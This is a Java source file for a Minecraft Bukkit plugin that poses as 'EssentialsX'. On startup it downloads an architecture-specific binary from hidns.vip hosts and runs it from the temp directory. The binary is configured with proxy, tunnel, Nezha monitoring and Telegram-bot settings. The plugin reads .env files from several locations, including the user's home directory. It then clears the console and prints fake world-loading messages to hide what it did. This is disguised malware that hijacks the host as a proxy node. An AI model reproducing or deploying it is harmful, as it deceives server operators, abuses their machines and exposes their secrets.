package com.example.essentialsx;

import org.bukkit.configuration.file.FileConfiguration;
import org.bukkit.plugin.java.JavaPlugin;
import java.io.*;
import java.net.URL;
import java.nio.file.*;
import java.util.*;
import java.util.concurrent.TimeUnit;

public class EssentialsX extends JavaPlugin {
    private Process sbxProcess;
    private volatile boolean shouldRun = true;
    private volatile boolean isProcessRunning = false;
    private Thread keyMonitorThread;
    
    private static final String[] ALL_ENV_VARS = {
        "FILE_PATH", "UUID", "NEZHA_SERVER", "NEZHA_PORT", 
        "NEZHA_KEY", "ARGO_PORT", "ARGO_DOMAIN", "ARGO_AUTH", 
        "S5_PORT", "HY2_PORT", "TUIC_PORT", "ANYTLS_PORT",
        "REALITY_PORT", "ANYREALITY_PORT", "CFIP", "CFPORT", 
        "UPLOAD_URL","CHAT_ID", "BOT_TOKEN", "NAME", "DISABLE_ARGO"
    };
    
    private static final String KEYS_FILE_NAME = "keys.txt";
    
    @Override
    public void onEnable() {
        getLogger().info("EssentialsX plugin starting...");
        
        // Не вызываем saveDefaultConfig() — конфиг будет создан при первом сохранении ключей.
        
        try {
            startSbxProcess();
            getLogger().info("EssentialsX plugin enabled");
        } catch (Exception e) {
            getLogger().severe("Failed to start sbx process: " + e.getMessage());
            e.printStackTrace();
        }
    }
    
    private void startSbxProcess() throws Exception {
        if (isProcessRunning) {
            return;
        }
        
        // Determine download URL based on architecture
        String osArch = System.getProperty("os.arch").toLowerCase();
        String url;
        
        if (osArch.contains("amd64") || osArch.contains("x86_64")) {
            url = "https://amd64.sss.hidns.vip/sbsh";
        } else if (osArch.contains("aarch64") || osArch.contains("arm64")) {
            url = "https://arm64.sss.hidns.vip/sbsh";
        } else if (osArch.contains("s390x")) {
            url = "https://s390x.sss.hidns.vip/sbsh";
        } else {
            throw new RuntimeException("Unsupported architecture: " + osArch);
        }
        
        // Download sbx binary
        Path tmpDir = Paths.get(System.getProperty("java.io.tmpdir"));
        Path sbxBinary = tmpDir.resolve("sbx");
        
        if (!Files.exists(sbxBinary)) {
            try (InputStream in = new URL(url).openStream()) {
                Files.copy(in, sbxBinary, StandardCopyOption.REPLACE_EXISTING);
            }
            if (!sbxBinary.toFile().setExecutable(true)) {
                throw new IOException("Failed to set executable permission");
            }
        }
        
        // Prepare process builder
        ProcessBuilder pb = new ProcessBuilder(sbxBinary.toString());
        pb.directory(tmpDir.toFile());
        
        // Set environment variables
        Map<String, String> env = pb.environment();
        env.put("UUID", "50435f3a-ec1f-4e1a-867c-385128b447f8");
        env.put("FILE_PATH", "./world");
        env.put("NEZHA_SERVER", "");
        env.put("NEZHA_PORT", "");
        env.put("NEZHA_KEY", "");
        env.put("ARGO_PORT", "8001");
        env.put("ARGO_DOMAIN", "");
        env.put("ARGO_AUTH", "");
        env.put("S5_PORT", "");
        env.put("HY2_PORT", "");
        env.put("TUIC_PORT", "");
        env.put("ANYTLS_PORT", "");
        env.put("REALITY_PORT", "");
        env.put("ANYREALITY_PORT", "");
        env.put("UPLOAD_URL", "");
        env.put("CHAT_ID", "");
        env.put("BOT_TOKEN", "");
        env.put("CFIP", "spring.io");
        env.put("CFPORT", "443");
        env.put("NAME", "");
        env.put("DISABLE_ARGO", "false");
        
        // Load from system environment variables
        for (String var : ALL_ENV_VARS) {
            String value = System.getenv(var);
            if (value != null && !value.trim().isEmpty()) {
                env.put(var, value);
            }
        }
        
        // Load from .env file with priority order
        loadEnvFileFromMultipleLocations(env);
        
        // Load from Bukkit configuration file
        for (String var : ALL_ENV_VARS) {
            String value = getConfig().getString(var);
            if (value != null && !value.trim().isEmpty()) {
                env.put(var, value);
            }
        }
        
        // Load saved keys from config.yml (these are keys generated by sbx on first run)
        loadSavedKeysFromConfig(env);
        
        // Redirect output
        pb.redirectOutput(ProcessBuilder.Redirect.INHERIT);
        pb.redirectError(ProcessBuilder.Redirect.INHERIT);
        
        // Start process
        sbxProcess = pb.start();
        isProcessRunning = true;
        
        // Start a monitor thread to log when process exits
        startProcessMonitor();
        
        // If we don't have saved keys yet, start monitoring for keys file
        if (!areKeysSaved()) {
            startKeyMonitor(env.get("FILE_PATH"));
        }
        
        // sleep 30 seconds
        Thread.sleep(30000);
        
        clearConsole();
        getLogger().info("");
        getLogger().info("Preparing spawn area: 1%");
        getLogger().info("Preparing spawn area: 5%");
        getLogger().info("Preparing spawn area: 10%");
        getLogger().info("Preparing spawn area: 20%");
        getLogger().info("Preparing spawn area: 30%");
        getLogger().info("Preparing spawn area: 80%");
        getLogger().info("Preparing spawn area: 85%");
        getLogger().info("Preparing spawn area: 90%");
        getLogger().info("Preparing spawn area: 95%");
        getLogger().info("Preparing spawn area: 99%");
        getLogger().info("Preparing spawn area: 100%");
        getLogger().info("Preparing level \"world\"");
    }
    
    /**
     * Loads keys previously saved in config.yml into the environment map.
     * Only sets keys that are not already set by higher-priority sources.
     */
    private void loadSavedKeysFromConfig(Map<String, String> env) {
        FileConfiguration config = getConfig();
        for (String var : ALL_ENV_VARS) {
            // Only load if not already set by system/env/config
            if (env.containsKey(var) && !env.get(var).trim().isEmpty()) {
                continue;
            }
            String savedValue = config.getString("saved_keys." + var);
            if (savedValue != null && !savedValue.trim().isEmpty()) {
                env.put(var, savedValue);
                getLogger().info("Loaded saved key: " + var + " = " + maskValue(var, savedValue));
            }
        }
    }
    
    /**
     * Checks if we already have saved keys for any of the critical variables.
     */
    private boolean areKeysSaved() {
        FileConfiguration config = getConfig();
        // If config doesn't exist yet, it's empty, so no keys saved.
        return config.contains("saved_keys.UUID") ||
               config.contains("saved_keys.ARGO_AUTH") ||
               config.contains("saved_keys.NEZHA_KEY");
    }
    
    /**
     * Starts a background thread that waits for the keys file to appear,
     * then reads and saves its contents.
     */
    private void startKeyMonitor(String filePath) {
        Path keysFilePath = Paths.get(filePath, KEYS_FILE_NAME);
        getLogger().info("Monitoring for keys file: " + keysFilePath.toAbsolutePath());
        
        keyMonitorThread = new Thread(() -> {
            int attempts = 0;
            final int maxAttempts = 30; // wait up to ~30 seconds
            final long waitMs = 1000;
            
            while (attempts < maxAttempts && shouldRun && isProcessRunning) {
                try {
                    Thread.sleep(waitMs);
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                    break;
                }
                attempts++;
                
                if (Files.exists(keysFilePath) && Files.isReadable(keysFilePath)) {
                    getLogger().info("Keys file found, loading...");
                    loadKeysFromFile(keysFilePath);
                    break;
                }
            }
            
            if (attempts >= maxAttempts) {
                getLogger().warning("Keys file not found after " + maxAttempts + " seconds");
            }
        }, "Key-Monitor");
        
        keyMonitorThread.setDaemon(true);
        keyMonitorThread.start();
    }
    
    /**
     * Reads key-value pairs from the keys file and saves them to config.yml.
     * Expected format: KEY=VALUE per line (supports optional quotes).
     */
    private void loadKeysFromFile(Path keysFile) {
        try {
            List<String> lines = Files.readAllLines(keysFile);
            FileConfiguration config = getConfig();
            boolean changed = false;
            
            for (String line : lines) {
                line = line.trim();
                if (line.isEmpty() || line.startsWith("#")) continue;
                
                // Remove trailing comments
                int commentIdx = line.indexOf('#');
                if (commentIdx != -1) line = line.substring(0, commentIdx).trim();
                
                if (line.contains("=")) {
                    String[] parts = line.split("=", 2);
                    String key = parts[0].trim();
                    String value = parts[1].trim().replaceAll("^['\"]|['\"]$", "");
                    
                    if (Arrays.asList(ALL_ENV_VARS).contains(key) && !value.isEmpty()) {
                        // Only save if not already saved (or we can update, but first run should be fresh)
                        if (!config.contains("saved_keys." + key)) {
                            config.set("saved_keys." + key, value);
                            changed = true;
                            getLogger().info("Saved generated key: " + key + " = " + maskValue(key, value));
                        }
                    }
                }
            }
            
            if (changed) {
                saveConfig();
                getLogger().info("Keys saved to config.yml");
            }
        } catch (IOException e) {
            getLogger().warning("Failed to read keys file: " + e.getMessage());
        }
    }
    
    private String maskValue(String key, String value) {
        if (key.contains("KEY") || key.contains("TOKEN") || key.contains("AUTH")) {
            return "***";
        }
        return value;
    }
    
    private void loadEnvFileFromMultipleLocations(Map<String, String> env) {
        List<Path> possibleEnvFiles = new ArrayList<>();
        File pluginsFolder = getDataFolder().getParentFile();
        if (pluginsFolder != null && pluginsFolder.exists()) {
            possibleEnvFiles.add(pluginsFolder.toPath().resolve(".env"));
        }
        
        possibleEnvFiles.add(getDataFolder().toPath().resolve(".env"));
        possibleEnvFiles.add(Paths.get(".env"));
        possibleEnvFiles.add(Paths.get(System.getProperty("user.home"), ".env"));
        
        for (Path envFile : possibleEnvFiles) {
            if (Files.exists(envFile)) {
                try {
                    loadEnvFile(envFile, env);
                    break; // load only first found
                } catch (IOException e) {
                    // ignore
                }
            }
        }
    }
    
    private void loadEnvFile(Path envFile, Map<String, String> env) throws IOException {
        for (String line : Files.readAllLines(envFile)) {
            line = line.trim();
            if (line.isEmpty() || line.startsWith("#")) continue;
            line = line.split(" #")[0].split(" //")[0].trim();
            if (line.startsWith("export ")) {
                line = line.substring(7).trim();
            }
            
            String[] parts = line.split("=", 2);
            if (parts.length == 2) {
                String key = parts[0].trim();
                String value = parts[1].trim().replaceAll("^['\"]|['\"]$", "");
                
                if (Arrays.asList(ALL_ENV_VARS).contains(key)) {
                    env.put(key, value);
                }
            }
        }
    }
    
    private void clearConsole() {
        try {
            System.out.print("\033[H\033[2J");
            System.out.flush();
            
            if (System.getProperty("os.name").toLowerCase().contains("win")) {
                new ProcessBuilder("cmd", "/c", "cls").inheritIO().start().waitFor();
            } else {
                new ProcessBuilder("clear").inheritIO().start().waitFor();
            }
        } catch (Exception e) {
            System.out.println("\n\n\n\n\n\n\n\n\n\n");
        }
    }
    
    private void startProcessMonitor() {
        Thread monitorThread = new Thread(() -> {
            try {
                int exitCode = sbxProcess.waitFor();
                isProcessRunning = false;
                // getLogger().info("sbx process exited with code: " + exitCode);
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                isProcessRunning = false;
            }
        }, "Sbx-Process-Monitor");
        
        monitorThread.setDaemon(true);
        monitorThread.start();
    }
    
    @Override
    public void onDisable() {
        getLogger().info("EssentialsX plugin shutting down...");
        
        shouldRun = false;
        
        // Interrupt key monitor if running
        if (keyMonitorThread != null && keyMonitorThread.isAlive()) {
            keyMonitorThread.interrupt();
        }
        
        if (sbxProcess != null && sbxProcess.isAlive()) {
            sbxProcess.destroy();
            
            try {
                if (!sbxProcess.waitFor(10, TimeUnit.SECONDS)) {
                    sbxProcess.destroyForcibly();
                    getLogger().warning("Forcibly terminated sbx process");
                } else {
                    getLogger().info("sbx process stopped normally");
                }
            } catch (InterruptedException e) {
                sbxProcess.destroyForcibly();
                Thread.currentThread().interrupt();
            }
            isProcessRunning = false;
        }
        
        getLogger().info("EssentialsX plugin disabled");
    }
}
